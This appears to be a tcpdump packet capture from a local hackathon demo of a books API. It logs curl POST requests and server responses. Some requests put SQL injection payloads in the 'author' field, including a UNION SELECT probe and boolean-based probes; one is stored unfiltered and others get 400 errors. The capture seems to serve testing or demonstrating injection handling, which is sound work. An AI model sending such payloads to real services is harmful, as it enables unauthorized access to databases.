21:34:11.140561 IP6 (hlim 64, next-header TCP (6) payload length: 249) ::1.54632 > ::1.8080: Flags [P.], cksum 0x0101 (incorrect -> 0xa33a), seq 1:218, ack 1, win 342, options [nop,nop,TS val 7071404 ecr 7071404], length 217: HTTP, length: 217
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 82
	
	{"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":"9.99"}[!http]
21:34:11.140576 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54632: Flags [.], cksum 0x0028 (incorrect -> 0x7e74), seq 1, ack 218, win 350, options [nop,nop,TS val 7071404 ecr 7071404], length 0
21:34:11.142117 IP6 (hlim 64, next-header TCP (6) payload length: 254) ::1.8080 > ::1.54632: Flags [P.], cksum 0x0106 (incorrect -> 0xffef), seq 1:223, ack 218, win 350, options [nop,nop,TS val 7071406 ecr 7071404], length 222: HTTP, length: 222
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	58
	{"id":73,"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":9.99}
21:34:11.142157 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7d92), seq 218, ack 223, win 350, options [nop,nop,TS val 7071406 ecr 7071406], length 0
21:34:11.142417 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54632: Flags [P.], cksum 0x002d (incorrect -> 0x396b), seq 223:228, ack 218, win 350, options [nop,nop,TS val 7071406 ecr 7071406], length 5: HTTP
21:34:11.142462 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7d8d), seq 218, ack 228, win 350, options [nop,nop,TS val 7071406 ecr 7071406], length 0
21:34:11.142699 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54632 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x7d8c), seq 218, ack 228, win 350, options [nop,nop,TS val 7071406 ecr 7071406], length 0
21:34:11.145165 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54632: Flags [F.], cksum 0x0028 (incorrect -> 0x7d88), seq 228, ack 219, win 350, options [nop,nop,TS val 7071409 ecr 7071406], length 0
21:34:11.145185 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7d85), seq 219, ack 229, win 350, options [nop,nop,TS val 7071409 ecr 7071409], length 0
21:34:11.160075 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54634 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x2208), seq 2693596295, win 43690, options [mss 65476,sackOK,TS val 7071424 ecr 0,nop,wscale 7], length 0
21:34:11.160102 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54634: Flags [S.], cksum 0x0030 (incorrect -> 0x92c4), seq 3676949724, ack 2693596296, win 43690, options [mss 65476,sackOK,TS val 7071424 ecr 7071424,nop,wscale 7], length 0
21:34:11.160121 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x64f6), seq 1, ack 1, win 342, options [nop,nop,TS val 7071424 ecr 7071424], length 0
21:34:11.160206 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54634 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x60a3), seq 1:197, ack 1, win 342, options [nop,nop,TS val 7071424 ecr 7071424], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo9","author":"Ramesh-P","price":"9.99"}[!http]
21:34:11.160219 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54634: Flags [.], cksum 0x0028 (incorrect -> 0x642a), seq 1, ack 197, win 350, options [nop,nop,TS val 7071424 ecr 7071424], length 0
21:34:11.163377 IP6 (hlim 64, next-header TCP (6) payload length: 233) ::1.8080 > ::1.54634: Flags [P.], cksum 0x00f1 (incorrect -> 0x84a7), seq 1:202, ack 197, win 350, options [nop,nop,TS val 7071427 ecr 7071424], length 201: HTTP, length: 201
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	43
	{"id":74,"name":"Hackathon-Demo9","author":"Ramesh-P","price":9.99}
21:34:11.163393 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x635b), seq 197, ack 202, win 350, options [nop,nop,TS val 7071427 ecr 7071427], length 0
21:34:11.163725 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54634: Flags [P.], cksum 0x002d (incorrect -> 0x1f34), seq 202:207, ack 197, win 350, options [nop,nop,TS val 7071427 ecr 7071427], length 5: HTTP
21:34:11.163745 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6356), seq 197, ack 207, win 350, options [nop,nop,TS val 7071427 ecr 7071427], length 0
21:34:11.163962 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54634 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x6354), seq 197, ack 207, win 350, options [nop,nop,TS val 7071428 ecr 7071427], length 0
21:34:11.164107 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54634: Flags [F.], cksum 0x0028 (incorrect -> 0x6352), seq 207, ack 198, win 350, options [nop,nop,TS val 7071428 ecr 7071428], length 0
21:34:11.164129 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6352), seq 198, ack 208, win 350, options [nop,nop,TS val 7071428 ecr 7071428], length 0
21:34:11.173231 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54636 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xe502), seq 178116461, win 43690, options [mss 65476,sackOK,TS val 7071437 ecr 0,nop,wscale 7], length 0
21:34:11.173266 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54636: Flags [S.], cksum 0x0030 (incorrect -> 0x0dce), seq 3463389563, ack 178116462, win 43690, options [mss 65476,sackOK,TS val 7071437 ecr 7071437,nop,wscale 7], length 0
21:34:11.173294 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54636 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdfff), seq 1, ack 1, win 342, options [nop,nop,TS val 7071437 ecr 7071437], length 0
21:34:11.173411 IP6 (hlim 64, next-header TCP (6) payload length: 260) ::1.54636 > ::1.8080: Flags [P.], cksum 0x010c (incorrect -> 0x2162), seq 1:229, ack 1, win 342, options [nop,nop,TS val 7071437 ecr 7071437], length 228: HTTP, length: 228
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 93
	
	{"name":"Hackathon-Demo10","author":"Ramesh %"))) AND 1868=7345 AND ((("%"="","price":"9.99"}[!http]
21:34:11.173429 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54636: Flags [.], cksum 0x0028 (incorrect -> 0xdf13), seq 1, ack 229, win 350, options [nop,nop,TS val 7071437 ecr 7071437], length 0
21:34:11.175502 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.54636: Flags [P.], cksum 0x0084 (incorrect -> 0x8f6b), seq 1:93, ack 229, win 350, options [nop,nop,TS val 7071439 ecr 7071437], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	Connection: close
	
21:34:11.175517 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54636 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdebb), seq 229, ack 93, win 342, options [nop,nop,TS val 7071439 ecr 7071439], length 0
21:34:11.175619 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54636: Flags [F.], cksum 0x0028 (incorrect -> 0xdeb2), seq 93, ack 229, win 350, options [nop,nop,TS val 7071439 ecr 7071439], length 0
21:34:11.175682 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54636 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xdeb9), seq 229, ack 94, win 342, options [nop,nop,TS val 7071439 ecr 7071439], length 0
21:34:11.175721 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54636: Flags [.], cksum 0x0028 (incorrect -> 0xdeb1), seq 94, ack 230, win 350, options [nop,nop,TS val 7071439 ecr 7071439], length 0
21:34:11.185992 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54638 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xc464), seq 1018807776, win 43690, options [mss 65476,sackOK,TS val 7071450 ecr 0,nop,wscale 7], length 0
21:34:11.186010 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54638: Flags [S.], cksum 0x0030 (incorrect -> 0x871c), seq 1531050671, ack 1018807777, win 43690, options [mss 65476,sackOK,TS val 7071450 ecr 7071450,nop,wscale 7], length 0
21:34:11.186026 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54638 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x594e), seq 1, ack 1, win 342, options [nop,nop,TS val 7071450 ecr 7071450], length 0
21:34:11.186111 IP6 (hlim 64, next-header TCP (6) payload length: 229) ::1.54638 > ::1.8080: Flags [P.], cksum 0x00ed (incorrect -> 0x58cc), seq 1:198, ack 1, win 342, options [nop,nop,TS val 7071450 ecr 7071450], length 197: HTTP, length: 197
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 62
	
	{"name":"Hackathon-Demo11","author":"Ramesh-P","price":"9.99"}[!http]
21:34:11.186124 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54638: Flags [.], cksum 0x0028 (incorrect -> 0x5881), seq 1, ack 198, win 350, options [nop,nop,TS val 7071450 ecr 7071450], length 0
21:34:11.188292 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.54638: Flags [P.], cksum 0x00f2 (incorrect -> 0x5dee), seq 1:203, ack 198, win 350, options [nop,nop,TS val 7071452 ecr 7071450], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	44
	{"id":75,"name":"Hackathon-Demo11","author":"Ramesh-P","price":9.99}
21:34:11.188316 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54638 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x57b3), seq 198, ack 203, win 350, options [nop,nop,TS val 7071452 ecr 7071452], length 0
21:34:11.188518 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54638: Flags [P.], cksum 0x002d (incorrect -> 0x138c), seq 203:208, ack 198, win 350, options [nop,nop,TS val 7071452 ecr 7071452], length 5: HTTP
21:34:11.188530 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54638 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x57ae), seq 198, ack 208, win 350, options [nop,nop,TS val 7071452 ecr 7071452], length 0
21:34:11.188642 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54638 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x57ad), seq 198, ack 208, win 350, options [nop,nop,TS val 7071452 ecr 7071452], length 0
21:34:11.188816 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54638: Flags [F.], cksum 0x0028 (incorrect -> 0x57ac), seq 208, ack 199, win 350, options [nop,nop,TS val 7071452 ecr 7071452], length 0
21:34:11.188831 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54638 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x57ac), seq 199, ack 209, win 350, options [nop,nop,TS val 7071452 ecr 7071452], length 0
21:34:11.199000 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54640 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xe9bd), seq 2567128110, win 43690, options [mss 65476,sackOK,TS val 7071463 ecr 0,nop,wscale 7], length 0
21:34:11.199021 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54640: Flags [S.], cksum 0x0030 (incorrect -> 0x5bf2), seq 3338395499, ack 2567128111, win 43690, options [mss 65476,sackOK,TS val 7071463 ecr 7071463,nop,wscale 7], length 0
21:34:11.199038 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54640 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x2e24), seq 1, ack 1, win 342, options [nop,nop,TS val 7071463 ecr 7071463], length 0
21:34:11.199115 IP6 (hlim 64, next-header TCP (6) payload length: 259) ::1.54640 > ::1.8080: Flags [P.], cksum 0x010b (incorrect -> 0x1707), seq 1:228, ack 1, win 342, options [nop,nop,TS val 7071463 ecr 7071463], length 227: HTTP, length: 227
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 92
	
	{"name":"Hackathon-Demo12","author":"Ramesh%"))) AND 3428=3428 AND ((("%"="","price":"9.99"}[!http]
21:34:11.199128 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54640: Flags [.], cksum 0x0028 (incorrect -> 0x2d39), seq 1, ack 228, win 350, options [nop,nop,TS val 7071463 ecr 7071463], length 0
21:34:11.200733 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.54640: Flags [P.], cksum 0x0084 (incorrect -> 0xdd91), seq 1:93, ack 228, win 350, options [nop,nop,TS val 7071464 ecr 7071463], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	Connection: close
	
